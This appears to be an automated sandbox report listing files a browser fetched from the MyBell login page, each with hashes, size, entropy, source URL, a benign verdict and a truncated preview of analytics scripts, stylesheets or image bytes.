                                                                                                                                                                                                                                                                                                                                      SHA1:10B91D659723A8539FF0E8854E3C73182017DF62
                                                                                                                                                                                                                                                                                                                                      SHA-256:3C10D3FDE06A4701F8646A8BEA7C78DFDC26C4F491D06ED5DECFE9A0F5033AEA
                                                                                                                                                                                                                                                                                                                                      SHA-512:5AEFB5B0A352C4625D340DAAE66A97F1E317A0BB5E7E9381F89783C673B4452CEF23DCF37855748A4975C0760C304D65631D096E7EE7E56A40848EA92E6E04E5
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/Styles/BRF3/core/css/connector.css
                                                                                                                                                                                                                                                                                                                                      Preview:header{background-color:#fff}.g-connector,.g-mobile-bar-btns-wrap{background-color:#00549a}.g-connector button:after,.g-hide{display:none!important}.g-header .g-skip-to-main-link{display:inline-block;padding:9px 12px;position:absolute;top:-50px;left:50%;-webkit-transform:translateX(-50%);transform:translateX(-50%);text-decoration:none;border-bottom-right-radius:8px;transition:top .3s ease-out;z-index:3000;color:#fff;text-transform:uppercase;font-size:11px;background:#2d2e33}.g-header .g-skip-to-main-link:focus-visible{top:0;outline:#fff solid 2px!important;outline-offset:4px!important;border-radius:2px!important}.g-header #connector.g-connector :focus,.g-header :focus{outline:0!important}.g-connector .sr-only,.g-federal-bar .sr-only{position:absolute;width:1px;height:1px;margin:-1px;padding:0;overflow:hidden;clip:rect(0,0,0,0);border:0}.g-mobile-nav-active .g-header{position:fixed;width:100%;top:0}.g-header{position:fixed;width:100%;top:0;z-index:17100}.g-connector-desktop-nav-backdrop
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.7773627950641693
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:qVZPV:qzd
                                                                                                                                                                                                                                                                                                                                      MD5:C83301425B2AD1D496473A5FF3D9ECCA
                                                                                                                                                                                                                                                                                                                                      SHA1:941EFB7368E46B27B937D34B07FC4D41DA01B002
                                                                                                                                                                                                                                                                                                                                      SHA-256:B633A587C652D02386C4F16F8C6F6AAB7352D97F16367C3C40576214372DD628
                                                                                                                                                                                                                                                                                                                                      SHA-512:83BAFE4C888008AFDD1B72C028C7F50DEE651CA9E7D8E1B332E0BF3AA1315884155A1458A304F6E5C5627E714BF5A855A8B8D7DB3F4EB2BB2789FE2F8F6A1D83
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://td.doubleclick.net/td/rul/953414520?random=1730380345423&cv=11&fst=1730380345423&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0h1v9172277568za200&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533422~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fmybell.bell.ca%2FLogin%3Flanguage%3Den&hn=www.googleadservices.com&frm=0&tiba=Log%20in%20to%20MyBell&npa=0&pscdl=noapi&auid=441004151.1730380345&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.134%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.134&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dgtag.config
                                                                                                                                                                                                                                                                                                                                      Preview:<html></html>
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (13876)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):344066
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.60485770250545
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6144:p4HQGbgBuDock2639cM8Gp/22wVtu9BW24nOX:iH9cuDocdVAEA
                                                                                                                                                                                                                                                                                                                                      MD5:10691335A54DD533A4DEF848795DBBAA
                                                                                                                                                                                                                                                                                                                                      SHA1:545B9E6D43DCD2AA81A9AF2092EFDBC0288C2AA9
                                                                                                                                                                                                                                                                                                                                      SHA-256:04EC450EF753C7CAE244DAD300A556B329EB61D1F9F6130E28446B586CCA8BF4
                                                                                                                                                                                                                                                                                                                                      SHA-512:D3310F8A24C5F884B12F88721D3904F849DEE39F83CC453E9FF10C1BBE3DDA6B816CFAEE57BE9C3EBAF30B7DD261C8CE05E3AC6598E0E71D3F09D9C03F268CA9
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":false},{"function":"__c","vtp_value":""},{"function":"__c","vtp_value":0}],. "tags":[{"function":"__ogt_ip_mark","priority":29,"vtp_instanceOrder":0,"vtp_paramValue":"internal","vtp_ruleResult":["macro",1],"tag_id":107},{"function":"__ogt_ip_mark","priority":29,"vtp_instanceOrder":1,"vtp_paramValue":"internal","vtp_ruleResult":["macro",2],"tag_id":109},{"function":"__ogt_dma","priority":29,"vtp_delegationMode":"ON","vtp_dmaDefault":"DENIED","tag_id":110},{"function":"__ogt_1p_data_v2","priority":29,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailTy
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:PNG image data, 40 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1423
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.7877511039669045
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:N2D3CC1VKBAbg3SY1zGcNMsfoVYFmkX2cEe/X1mY:NU1QBHSYkc6sf0+mkX25e/lmY
                                                                                                                                                                                                                                                                                                                                      MD5:2822D47A99B4380920EE42A64B03BD99
                                                                                                                                                                                                                                                                                                                                      SHA1:B2BC90E16162F5872D25E8284E844C898AEA84CE
                                                                                                                                                                                                                                                                                                                                      SHA-256:A48DBE9C7000DC6F17E9B10FA0E90A13744186FE6CAC738C82AC5BAF19920E21
                                                                                                                                                                                                                                                                                                                                      SHA-512:8418FD508F5F0CC84A830A9482A8CD40E40E007E58D68A31BF9223B0A32C0504BAC14A7ACC157F13A7DEE9CB8ACBEEA76B67F906C32A482B746095CF107928BC
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:.PNG........IHDR...(...d......drz....tEXtSoftware.Adobe ImageReadyq.e<...1IDATx..[h.W...-..J5.`.6."..A.....H..............h.o./....Bk.Cq. h.E.*.C*.J.q.T.6D..E.&..........3.s....;.3.o...LB|e..H.&..d@...S..!..y...... k.*.`.....:.?.....`..U........8..+....`...V.f0..F....0Z... ....7p...c.k/....".v.d..r....gy.I...........{.i[.W=..Kl'.......4.&..(.R.G#.L.....Y^.2:.j0,*.....;K.d..5wH....J..nM....)X.S.N.^....Nw..........cXX.V#&5.Q.q...+.735lL.y..\.6..F.7..;...ff..d;wD..GXv5].;..v_........]..`....{...(...4!....{.J......L0..".P..]...W" ...t.Zn.E@P9..j$|?...aJ..Ld".9.....S.y.. ..x..)...aP..s{...W./...`7.Wx..$...[.<..f........L...Z.8..+...N...'.SC7...#2.E....t....N....E...~..E...=.M...._.`.a.7....ig.LA..bC~5i.....k8/y....O.....6,TK".V.F97.c...k....Y....-7/.5...m.....$.n...v.4...i....q..d..a.m.-g.6.%...t...$<.%....imeY.G.&3.xgs.z....8)...<f3.......Yx.Dr.....".e...`..E^...#.!.4...C.%...\J....yUxY.....^~.....^..]N.4-0..BA...&WL..@.rv.v"...,..#..I.uu...Y...N
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (3969)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):289064
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.560185481851013
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:+IwiztGbET0a0oKy045CptDY8/I8+yU/OUYhcDm6DcM8Gp/9Lp:PGbgT0oVMYGUT9cM8Gp/9t
                                                                                                                                                                                                                                                                                                                                      MD5:5A492B409A7194B24A6349A9189BE92C
                                                                                                                                                                                                                                                                                                                                      SHA1:AB235ED71D7C4AE22251294CEA30473DB026E3CC
                                                                                                                                                                                                                                                                                                                                      SHA-256:4FA62A94CB1DE46A5BDA3A27624FEB0CAB6D5E227A577E23EE547E9E5F784F37
                                                                                                                                                                                                                                                                                                                                      SHA-512:14D2521A90E378756134DCC95787635BED7DB34D54C739A0955E6D4FF115E8FC037FA9BB9E5E5CEE81B88ED3CFF38F05059D6D83FF56179AADE60B8FD4862D34
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.googletagmanager.com/gtag/js?id=AW-953414520
                                                                                                                                                                                                                                                                                                                                      Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"2",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_ads_datatos","priority":16,"vtp_instanceDesusertionId":"AW-953414520","tag_id":13},{"function":"__ogt_1p_data_v2","priority":6,"vtp_isAutoEnabled":true,"vtp_isManualEnabled":false,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CSS_SELECTOR","vtp_autoEmailEnabled":true,"vtp_postalCodeValue":"","vtp_lastNameValue":"","vtp_phoneType":"CSS_SELECTOR","vtp_phoneValue":"","vtp_streetType":"CSS_SELECTOR","vtp_autoPhoneEnabled":false,"vtp_postalCodeType":"CSS_SELECTOR","vtp_emailValue":"","vtp_firstNameValue":"","vtp_streetValue":"","vtp_lastNameType":"CSS_SELECTOR","vtp_autoAdd
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):22294
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.012541415403019
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:G36HNwdTyTU3yvbGr7oUKKWKWKjLuKCKGoUKJWKUbMKM4wmYHQj/t12hbhPzYHlb:rb3bGr7oUKZKWKjLuKCKGoUKMKUbMKMq
                                                                                                                                                                                                                                                                                                                                      MD5:4CB343C9D9B392CA2C3C7E8B21E4AC61
                                                                                                                                                                                                                                                                                                                                      SHA1:49F7A4D27AD646BE0C6BBB320BF29043F32FC4A0
                                                                                                                                                                                                                                                                                                                                      SHA-256:5390ED1A40D48B255D6E21B48AD913B4D70B9FB47809622CD4A8BB59BA20DAA6
                                                                                                                                                                                                                                                                                                                                      SHA-512:A301BD859E576FAE94BC7A75ACFBA0A816F19539AC1EE54E42F5CF1541213EF23C236485A5AAD11922BEC80DE86B3171E1BB7CAB8B8F86F59E537BD1B6508FCD
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Resource/web/js/Omniture.js?ver=202410201632
                                                                                                                                                                                                                                                                                                                                      Preview:./* function 2 is used to send values for all required Omniture variables. */..function PassValuesToOmnitureVariables(fieldValue, replaceConditions) {.. var returnval;.. var keyvalueColl = replaceConditions.split('^');.. for (var i = 0; i < keyvalueColl.length; i++) {.. keyvaluepair = keyvalueColl[i].split(':');.. returnval = fieldValue.replace(keyvaluepair[0].toString(), keyvaluepair[1].toString());.. fieldValue = returnval;.. }.. TrackVariables(fieldValue);..}......function TrackVariables(omniVal) {.. s_oTrackPage(eval("(" + omniVal + ")"));..}....function SendJSVariablesToOmniture(fieldValue, replaceConditions, errorCode) {.. fieldValue = fieldValue.replace("#ARS#", errorCode); .. PassValuesToOmnitureVariables(fieldValue, replaceConditions);..}....../* Omniture P31463 .. As per P31463 requirement new varibale for each LOB is to be tracked... This variable is in general the account number.. the below updated functions are to cover t
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "LEAD Technologies Inc. V1.01", baseline, precision 8, 176x56, components 3
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):5710
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.744889276138522
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:kE18gUZLqjM7XVs/RrubOkUBQcdYG6s+G8S7XRGgV1u8RahNTooD1A:k5gUZGjM7X6AvcuG6s+Gx7Fq8Ahlo1
                                                                                                                                                                                                                                                                                                                                      MD5:1C0485983974299CCB4AED930D886D84
                                                                                                                                                                                                                                                                                                                                      SHA1:99EF139A0A1E50626C85CE274B544AC81BF54870
                                                                                                                                                                                                                                                                                                                                      SHA-256:3EA9125EA4CC2B1B778E4ABC6887B1E987714C114496A1BB52F6B4871710B6F2
                                                                                                                                                                                                                                                                                                                                      SHA-512:528306AD322D6E7BBFB141C8663CA378B60278F5A511E143116042AEDD972AEB02E9B8293095B4C18E893DF9DDDEA95AB3ADD703EE7F803D6E359C4CEEA5A550
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF.....`.`......LEAD Technologies Inc. V1.01....C....................................................................C.......................................................................8...."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..........l.......c...ZL.2./H.59.m..|...F.........o....W."...Au...W.R.?.3@............_.(....Q.|.pn..."....._.Uy....)f...r{}}..o. g......f.....t...>..+.~xHI&i7.v....I..8. .2.......|D..$7Y.....}.p............*.k..O.......o..x[.e.....'....A1.+........3.pq..G.....y.r#.J..N....s..t......y................P.......j.......x..:]...".-..
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):6
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.584962500721156
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:kn:k
                                                                                                                                                                                                                                                                                                                                      MD5:8ECA36DE2DC5831816C1E7FDEFF2A66A
                                                                                                                                                                                                                                                                                                                                      SHA1:931AFB9F4647D495E1783623E25FC1CB93C9CB91
                                                                                                                                                                                                                                                                                                                                      SHA-256:A689579E15FCDB149AA4B8ADF80C1D26D097A8FA2FA17A2849E8191BDFF686F9
                                                                                                                                                                                                                                                                                                                                      SHA-512:ABE57F9E101635D338944DBE7C542AC18F80DDB1FD9A971BB4A1C22B7FAF7DCAAFC01CB9F6ACEDEBCF3B9C715DFDA44A0ED4E43F34D70A3819316356134484FF
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:FL(OA)
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (1680), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1680
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.731511957816592
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:2jkm94oHPccXAAbBlB9+KVCe2TLph9gFB5vtADjkrDQndcl/1t4glvllLtfO1/66:iEckKo7LmvtUjPKtX7ZO1/2LrwUnG
                                                                                                                                                                                                                                                                                                                                      MD5:CB8040A68003281432BFFA54A6DDAD40
                                                                                                                                                                                                                                                                                                                                      SHA1:C238C5B17BA77105B7B97D063FAC9323E6FECDFD
                                                                                                                                                                                                                                                                                                                                      SHA-256:AA5D2A77A6C22CDA13FD33A224D4897B3F8BCB54EB1CB559A649519FFE66863B
                                                                                                                                                                                                                                                                                                                                      SHA-512:44D0DE8F556EF49C6A41BAC83A2797A948D212486DC8A3DFCE1E20779EBB29CA72F634DD5EC0C44EC27105B6F41A3B679EC34C66695C4241E8CCF4F1D670AB52
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.google.com/recaptcha/enterprise.js?onload=getCaptchaEnterprise&hl=en&render=6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP
                                                                                                                                                                                                                                                                                                                                      Preview:/* PLEASE DO NOT COPY AND PASTE THIS CODE. */(function(){var w=window,C='___grecaptcha_cfg',cfg=w[C]=w[C]||{},N='grecaptcha';var E='enterprise',a=w[N]=w[N]||{},gr=a[E]=a[E]||{};gr.ready=gr.ready||function(f){(cfg['fns']=cfg['fns']||[]).push(f);};w['__recaptcha_api']='https://www.google.com/recaptcha/enterprise/';(cfg['enterprise']=cfg['enterprise']||[]).push(true);(cfg['enterprise2fa']=cfg['enterprise2fa']||[]).push(true);(cfg['render']=cfg['render']||[]).push('6LeIfTIaAAAAAHMPXsezv4PdsckDc-wAJU-eo2YP');(cfg['onload']=cfg['onload']||[]).push('getCaptchaEnterprise');w['__google_recaptcha_client']=true;var d=document,po=d.createElement('script');po.type='text/javascript';po.async=true; po.charset='utf-8';var v=w.navigator,m=d.createElement('meta');m.httpEquiv='origin-trial';m.content='A/kargTFyk8MR5ueravczef/wIlTkbVk1qXQesp39nV+xNECPdLBVeYffxrM8TmZT6RArWGQVCJ0LRivD7glcAUAAACQeyJvcmlnaW4iOiJodHRwczovL2dvb2dsZS5jb206NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLC
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (677)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):824
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.458929894882583
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:zlujct/BMluTTMM3+SzYI8zlRWxpSTCuNjCxQ:zlrt/BMlyO28zlwDWNWxQ
                                                                                                                                                                                                                                                                                                                                      MD5:B83340A87AC1DFA6623C7E9738E97562
                                                                                                                                                                                                                                                                                                                                      SHA1:53FD22C0B2BC4F522799D005A5915B629093E757
                                                                                                                                                                                                                                                                                                                                      SHA-256:F442AFA4333F16FF33F0526E2D81386D76E8ADABFB4CF94CA6169B4425F0C170
                                                                                                                                                                                                                                                                                                                                      SHA-512:B336C7642A1A4FB8CDB277AC9404DAC85C27FD4539DECF11AA053EB89869D75A9787D4342ED5354B3EA9510B83B6BEA758742D2CA8CB3B986A4E63FD851A79C9
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCa4958c9bb22a442ba8003fb2e6085ec2-source.min.js
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCa4958c9bb22a442ba8003fb2e6085ec2-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RCa4958c9bb22a442ba8003fb2e6085ec2-source.min.js', "try{!function(e,a,n,t,o){var c,d,r;e[o]=e[o]||[],c=function(){var a={ti:\"19004038\"};a.q=e[o],e[o]=new UET(a),e[o].push(\"pageLoad\")},(d=a.createElement(n)).src=t,d.async=1,d.onload=d.onreadystatechange=function(){var e=this.readyState;e&&\"loaded\"!==e&&\"complete\"!==e||(c(),d.onload=d.onreadystatechange=null)},(r=a.getElementsByTagName(n)[0]).parentNode.insertBefore(d,r)}(window,document,\"script\",\"//bat.bing.com/bat.js\",\"uetq\")}catch(e){console.log(\"Adobe Launch: Error: Window Loaded - Bing (Site wide):\",e)}");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (774)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):43211
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.519539023318683
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:0W+FIMt+5FdAPnMhpn2g6IKO9yZI92tMujTXOyrbARaLPk6TO3Am8biK4gZK/Xf+:0Wz/pKC9qng6T3WKXK/XfNPhNREhSQ
                                                                                                                                                                                                                                                                                                                                      MD5:DA800C7A6725ACD0F789BD737CF188FF
                                                                                                                                                                                                                                                                                                                                      SHA1:C3B1073526101A7490744695BFCD2871ABBFFB04
                                                                                                                                                                                                                                                                                                                                      SHA-256:7A28F558E497F8ECEBC8242CCBA48DE0E9CB6A1D9A49A2DAF020935EA9449E27
                                                                                                                                                                                                                                                                                                                                      SHA-512:3C14202920560B97D1D7D9050168DCA5F5DF3289E09148AF6AB73D74A4D3EE0F88E0E37D26B204A37F840BEB5550A69DF51F6EC9BCDD6B7AE714FDC2EAB4938A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:(function dn(){function fb(u,t){return Wa(u)&&"href"===t?1:Za(u)&&"value"===t?32:qc.Qd.some(function(A){return A.test(t)})?16:Pa(u)&&"value"===t?2===mb(u)?16:1:1}function mb(u){if(Ra(u)||Ra(u.parentNode))return 1;qd.has(u)&&Yc.set(u,Yc.get(u)|8);ad.has(u)&&Yc.set(u,Yc.get(u)|2);uc.has(u)&&(qc.qb?kd.set(u,kd.get(u)|1):kd.set(u,kd.get(u)|4));La(u)&&u.hasAttribute("data-dtrum-mask")&&(Oa(u)?kd.set(u,kd.get(u)|4):Yc.set(u,Yc.get(u)|10));if(Yc.has(u))return Yc.get(u);if(kd.has(u))return kd.get(u);var t=.u,A=!1;t.nodeType===Node.TEXT_NODE&&(t=t.parentNode,A=!0);var P=Oa(t);var ea=A;void 0===ea&&(ea=!1);ea=!P||ea||"OPTION"===t.nodeName?(P?kd:Yc).get(ea?t:t.parentNode):void 0;var Ma=void 0;P&&cb(qc.ub,t)&&(Ma|=4);!P&&cb(qc.sb,t)&&(Ma|=2);!P&&cb(qc.yb,t)&&(Ma|=8);if(Ma||P)a:if(P=void 0===P?!1:P,A=void 0===A?!1:A,!P&&Ma)ea=Ma;else{if(P){Ma=Ma&&!(Ma&1)||qc.qb?(!Ma||Ma&1)&&qc.qb||Ma&&!(Ma&1)&&!qc.qb?t.parentNode&&Oa(t.parentNode)?ea&&!(ea&1):!0:!1:ea&&!(ea&1);if(A&&Ma){ea=ea?ea:2;break a}if(Ma){ea
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:C source, ASCII text, with very long lines (65098)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):218963
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.367074765150292
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3072:g6HK9hyNODcG1uoO2FiqGHGDmPhXUbzTBasyvLZ9+Mqy:NK9hykdDGHjXUvssyqy
                                                                                                                                                                                                                                                                                                                                      MD5:DFE5EC7350C655FA077DB5D93C98D025
                                                                                                                                                                                                                                                                                                                                      SHA1:D3407282E7F83ECBF135DE9E9A489A945D36B355
                                                                                                                                                                                                                                                                                                                                      SHA-256:AAA3677440F44DC9C11249CF6291644C13C1B0EEB7BA01325ED493178F7A10A6
                                                                                                                                                                                                                                                                                                                                      SHA-512:84D4A091A79544E4217C89EA501F19F09BE18E705507DB1B1A21CF392106AC68BBC88F071D9EA561D7AC1632FD438C340C6C78E2E6D954B80744B58E0C5636FD
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/*. * Copyright (c) 2011, Yahoo! Inc. All rights reserved.. * Copyright (c) 2011-2012, Log-Normal, Inc. All rights reserved.. * Copyright (c) 2012-2017, SOASTA, Inc. All rights reserved.. * Copyright (c) 2017-2022, Akamai Technologies, Inc. All rights reserved.. * Copyrights licensed under the BSD License. See the accompanying LICENSE.txt file for terms.. */./* Boomerang Version: 1.792.0 e2ad31965b3add033aa3d32556a8d4f0cf9b8e56 */..BOOMR_start=(new Date).getTime();function BOOMR_check_doc_domain(e){if(window){if(!e){if(window.parent===window||!document.getElementById("boomr-if-as"))return;if(window.BOOMR&&BOOMR.boomerang_frame&&BOOMR.window)try{BOOMR.boomerang_frame.document.domain!==BOOMR.window.document.domain&&(BOOMR.boomerang_frame.document.domain=BOOMR.window.document.domain)}catch(t){BOOMR.isCrossOriginError(t)||BOOMR.addError(t,"BOOMR_check_doc_domain.domainFix")}e=document.domain}if(e&&-1!==e.indexOf(".")&&window.parent){try{window.parent.document;return}catch(t){try{document
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (711)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):858
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.441955589066
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:24:zlA2dct/BMlA2vJUYJlJiJQJSJ/8rVnXvIQrZIC2Hpb:zlQt/BMlVHgqYx8rVAgaCq
                                                                                                                                                                                                                                                                                                                                      MD5:3353F3431C4748CD263D463EC565E30A
